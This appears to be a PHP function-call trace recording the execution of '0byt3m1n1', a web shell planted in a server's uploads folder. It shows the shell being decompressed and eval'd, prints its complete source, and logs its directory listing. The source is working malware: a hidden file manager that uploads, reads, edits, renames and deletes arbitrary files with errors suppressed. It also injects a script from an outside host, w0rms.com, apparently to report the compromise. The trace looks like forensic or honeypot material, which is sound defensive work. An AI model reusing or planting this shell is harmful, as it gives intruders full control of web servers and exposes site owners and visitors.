3	13	R			'x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\021��*\037C'
3	14	0	0.001328	404144	gzuncompress	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code	1	1	'x��Y[s�6\026~���\003���4�DJv\034�$���I�I�d\032wg���C���\tE� \024�U��{\016\000^u���>�M\002�s��\001��\027�<=>:>b�<!�8�x�\n�qϞ\v�\016M��⋬�%\v��3�\003\005gl*A�\030\035\037eL܊p�n�p\021��Ձ1�y�o9K\023.�x�\006à=\003م;\v��ߗ�`��,�ڝ�*H8s�y�u��ç+�f���=�N�\033-Yg�Ưq��$\023�=��lβ��\031���G\027�����7W�}|K�b\0219c����3��3�s\026ؔ\022�"�f�!b`�\tJ�C�l*ؽ0�,��X�"b�5}\020\'�~�\037�j\000|��\fLT\006�\n�Xd�Y��"榡J\032ع\b�E\030=��:\031�\030ҫQz5К|�p?M����>�x���!y:8\003\023�#/�\022>|�<\026\004�\021��*\037C'
3	14	1	0.001448	412368
3	14	R			'<?php\r\n\r\necho \'<script src=http://w0rms.com/kaydet.php></script>\';\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}\r\n?>\r\n<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>\r\n<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>\r\n<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;fon'
3	15	0	0.001719	462440	eval	1	'?><?php\r\n\r\necho \'<script src=http://w0rms.com/kaydet.php></script>\';\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}\r\n?>\r\n<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>\r\n<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>\r\n<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;font-size: 14px;}h1{font-family:\'VT323\';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:\'Courier\'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>\r\n</head><body> <?php echo\'<div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1</center></h1></div>\';\r\nif(isset($_GET[\'path\'])) {$path = $_GET[\'path\'];chdir($_GET[\'path\']);} else {$path = getcwd();}\r\n$path = str_replace("\\\\","/",$path);$paths = explode("/", $path);\r\necho \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';echo "<font style=\'font-size:13px;\'>Path: ";\r\nforeach($paths as $id => $pat) {echo "<a style=\'font-size:13px;\' href=\'?path=";\r\nfor($i = 0; $i <= $id; $i++) {echo $paths[$i];\r\nif($i != $id) {echo "/";} }echo "\'>$pat</a>/";}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/>\r\n<input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<center><font color="#00ff00">Upload OK!.</font></center><br/>\';}\r\nelse{echo \'<center><font color="red">Upload Failed!.</font></center><br/>\';}}\r\necho \'</td></tr><tr><td></table>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';echo "".basename($_GET[\'filesrc\']);"";echo \'</tr></td></table><br />\';echo("<center><textarea readonly=\'\'>".htmlspecialchars(file_get_contents($_GET[\'filesrc\']))."</textarea></center>");}\r\nelseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n}else{\r\necho \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n} $_POST[\'name\'] = $_POST[\'newname\'];}\r\necho \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');if(fwrite($fp,$_POST[\'src\'])){echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n}else{echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';}fclose($fp);}\r\necho \'<form method="POST"><textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br /><input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';}echo \'</center>\';}else{echo \'</table><br /><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n}else{echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){echo \'<font color="#00ff00">Delete File Done.</font><br />\';}else{\r\necho \'<font color="red">Delete File Error.</font><br />\';}}}echo \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first">\r\n<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>\r\n<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="#00ff00">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\necho"</center></td><td><center>".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "</center></td>\r\n<td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";}\r\nforeach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);if($size >= 1024){$size = round($size/1024,2).\' MB\';}else{$size = $size.\' KB\';}\r\necho "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>".$size."</center></td><td><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="#00ff00">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\necho"</center></td><td><center>".date("d-M-Y H:i",filemtime("$path/$file"))."";\r\necho "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";}\r\necho \'</table></div>\';}echo \'</body></html>\';\r\nfunction perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = \'s\';} elseif (($perms & 0xA000) == 0xA000) {$info = \'l\';} elseif (($perms & 0x8000) == 0x8000) {$info = \'-\';} elseif (($perms & 0x6000) == 0x6000) {$info = \'b\';} elseif (($perms & 0x4000) == 0x4000) {$info = \'d\';} elseif (($perms & 0x2000) == 0x2000) {$info = \'c\';} elseif (($perms & 0x1000) == 0x1000) {$info = \'p\';} else {$info = \'u\';} $info .= (($perms & 0x0100) ? \'r\' : \'-\');$info .= (($perms & 0x0080) ? \'w\' : \'-\');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\' ) : (($perms & 0x0800) ? \'S\' : \'-\'));$info .= (($perms & 0x0020) ? \'r\' : \'-\');$info .= (($perms & 0x0010) ? \'w\' : \'-\');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\' ) : (($perms & 0x0400) ? \'S\' : \'-\'));$info .= (($perms & 0x0004) ? \'r\' : \'-\');$info .= (($perms & 0x0002) ? \'w\' : \'-\');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\' ) : (($perms & 0x0200) ? \'T\' : \'-\'));return $info;}\r\necho\'<br><center>&copy; 2017 - <a href="http://zerobyte.id/">ZeroByte.ID</a> Recoded from Kodong.</center><br>\';?>'	/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code	1	0
4	16	0	0.001886	462440	set_time_limit	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	4	1	0
4	16	1	0.001904	462504
4	16	R			FALSE
4	17	0	0.001919	462472	error_reporting	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	5	1	0
4	17	1	0.001934	462512
4	17	R			22527
4	18	0	0.001948	462472	get_magic_quotes_gpc	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	6	0
4	18	1	0.001962	462472
4	18	R			FALSE
4	19	0	0.001976	462472	getcwd	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	12	0
4	19	1	0.001994	462520
4	19	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	12	$path = '/var/www/html/uploads'
4	20	0	0.002023	462520	str_replace	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	13	3	'\\'	'/'	'/var/www/html/uploads'
4	20	1	0.002039	462616
4	20	R			'/var/www/html/uploads'
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	13	$path = '/var/www/html/uploads'
4	21	0	0.002066	462520	explode	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	13	2	'/'	'/var/www/html/uploads'
4	21	1	0.002082	463096
4	21	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	13	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	15	$id = 0
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	15	$id = 1
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	15	$id = 2
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	15	$id = 3
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	15	$id = 4
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i = 0
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	16	$i++
4	22	0	0.002351	463024	scandir	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	51	1	'/var/www/html/uploads'
4	22	1	0.002386	463648
4	22	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '0byt3m1n1.php', 4 => 'data', 5 => 'prepend.php']
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	51	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '0byt3m1n1.php', 4 => 'data', 5 => 'prepend.php']
4	23	0	0.002426	463664	is_dir	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/.'
4	23	1	0.002444	463728
4	23	R			TRUE
4	24	0	0.002459	463696	is_dir	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/..'
4	24	1	0.002476	463744
4	24	R			TRUE
4	25	0	0.002490	463704	is_dir	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/.htaccess'
4	25	1	0.002506	463744
4	25	R			FALSE
4	26	0	0.002519	463712	is_dir	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/0byt3m1n1.php'
4	26	1	0.002535	463760
4	26	R			FALSE
4	27	0	0.002548	463712	is_dir	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/data'
4	27	1	0.002563	463744
4	27	R			TRUE
4	28	0	0.002577	463704	is_writable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	58	1	'/var/www/html/uploads/data'
4	28	1	0.002596	463744
4	28	R			TRUE
4	29	0	0.002610	463704	perms	1		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	60	1	'/var/www/html/uploads/data'
5	30	0	0.002629	463704	fileperms	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	1	'/var/www/html/uploads/data'
5	30	1	0.002644	463744
5	30	R			16895
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$perms = 16895
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info = 'd'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'x'
4	29	1	0.002772	463744
4	29	R			'drwxrwxrwx'
4	31	0	0.002786	463704	is_writable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	61	1	'/var/www/html/uploads/data'
4	31	1	0.002832	463744
4	31	R			TRUE
4	32	0	0.002847	463704	filemtime	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	62	1	'/var/www/html/uploads/data'
4	32	1	0.002862	463744
4	32	R			1676253028
4	33	0	0.002875	463648	date	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	62	2	'd-M-Y H:i'	1676253028
4	33	1	0.002938	466040
4	33	R			'12-Feb-2023 20:50'
4	34	0	0.002958	465776	is_dir	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	56	1	'/var/www/html/uploads/prepend.php'
4	34	1	0.002977	465824
4	34	R			FALSE
4	35	0	0.002991	465768	is_file	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/.'
4	35	1	0.003007	465792
4	35	R			FALSE
4	36	0	0.003021	465760	is_file	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/..'
4	36	1	0.003037	465808
4	36	R			FALSE
4	37	0	0.003050	465768	is_file	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/.htaccess'
4	37	1	0.003066	465808
4	37	R			TRUE
4	38	0	0.003079	465768	filesize	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/.htaccess'
4	38	1	0.003093	465808
4	38	R			64
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	$size = 0.0625
4	39	0	0.003120	465712	round	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	2	0.0625	3
4	39	1	0.003135	465784
4	39	R			0.063
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	$size = 0.063
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	$size = '0.063 KB'
4	40	0	0.003175	465808	is_writable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	67	1	'/var/www/html/uploads/.htaccess'
4	40	1	0.003193	465848
4	40	R			FALSE
4	41	0	0.003206	465808	is_readable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	68	1	'/var/www/html/uploads/.htaccess'
4	41	1	0.003222	465848
4	41	R			TRUE
4	42	0	0.003235	465808	perms	1		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	69	1	'/var/www/html/uploads/.htaccess'
5	43	0	0.003249	465808	fileperms	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	1	'/var/www/html/uploads/.htaccess'
5	43	1	0.003264	465848
5	43	R			33188
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$perms = 33188
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info = '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4	42	1	0.003404	465848
4	42	R			'-rw-r--r--'
4	44	0	0.003419	465808	is_writable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/.htaccess'
4	44	1	0.003436	465848
4	44	R			FALSE
4	45	0	0.003450	465808	is_readable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/.htaccess'
4	45	1	0.003465	465848
4	45	R			TRUE
4	46	0	0.003479	465808	filemtime	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	71	1	'/var/www/html/uploads/.htaccess'
4	46	1	0.003493	465848
4	46	R			1676253028
4	47	0	0.003507	465752	date	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	71	2	'd-M-Y H:i'	1676253028
4	47	1	0.003539	466080
4	47	R			'12-Feb-2023 20:50'
4	48	0	0.003555	465816	is_file	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/0byt3m1n1.php'
4	48	1	0.003570	465864
4	48	R			TRUE
4	49	0	0.003583	465824	filesize	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/0byt3m1n1.php'
4	49	1	0.003596	465864
4	49	R			3639
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	$size = 3.5537109375
4	50	0	0.003621	465720	round	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	2	3.5537109375	3
4	50	1	0.003636	465792
4	50	R			3.554
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	$size = 3.554
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	$size = '3.554 KB'
4	51	0	0.003682	465824	is_writable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	67	1	'/var/www/html/uploads/0byt3m1n1.php'
4	51	1	0.003699	465864
4	51	R			FALSE
4	52	0	0.003713	465824	is_readable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	68	1	'/var/www/html/uploads/0byt3m1n1.php'
4	52	1	0.003728	465864
4	52	R			TRUE
4	53	0	0.003742	465824	perms	1		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	69	1	'/var/www/html/uploads/0byt3m1n1.php'
5	54	0	0.003756	465824	fileperms	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	1	'/var/www/html/uploads/0byt3m1n1.php'
5	54	1	0.003770	465864
5	54	R			33204
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$perms = 33204
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info = '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'w'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= 'r'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	74	$info .= '-'
4	53	1	0.003895	465864
4	53	R			'-rw-rw-r--'
4	55	0	0.003909	465824	is_writable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/0byt3m1n1.php'
4	55	1	0.003926	465864
4	55	R			FALSE
4	56	0	0.003939	465824	is_readable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	70	1	'/var/www/html/uploads/0byt3m1n1.php'
4	56	1	0.003955	465864
4	56	R			TRUE
4	57	0	0.003968	465824	filemtime	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	71	1	'/var/www/html/uploads/0byt3m1n1.php'
4	57	1	0.003982	465864
4	57	R			1676253028
4	58	0	0.003995	465760	date	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	71	2	'd-M-Y H:i'	1676253028
4	58	1	0.004032	466088
4	58	R			'12-Feb-2023 20:50'
4	59	0	0.004048	465816	is_file	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/data'
4	59	1	0.004064	465848
4	59	R			FALSE
4	60	0	0.004077	465816	is_file	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/prepend.php'
4	60	1	0.004094	465864
4	60	R			TRUE
4	61	0	0.004107	465824	filesize	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	1	'/var/www/html/uploads/prepend.php'
4	61	1	0.004122	465864
4	61	R			57
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	64	$size = 0.0556640625
4	62	0	0.004147	465720	round	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	2	0.0556640625	3
4	62	1	0.004162	465792
4	62	R			0.056
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	$size = 0.056
3		A						/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	65	$size = '0.056 KB'
4	63	0	0.004205	465936	is_writable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	67	1	'/var/www/html/uploads/prepend.php'
4	63	1	0.004223	465976
4	63	R			FALSE
4	64	0	0.004236	465936	is_readable	0		/var/www/html/uploads/0byt3m1n1.php(5) : eval()'d code(1) : eval()'d code	68	1	'/var/www/html/uploads/prepend.php'
4	64	1	0.004253	465976
4	64	R			TRUE
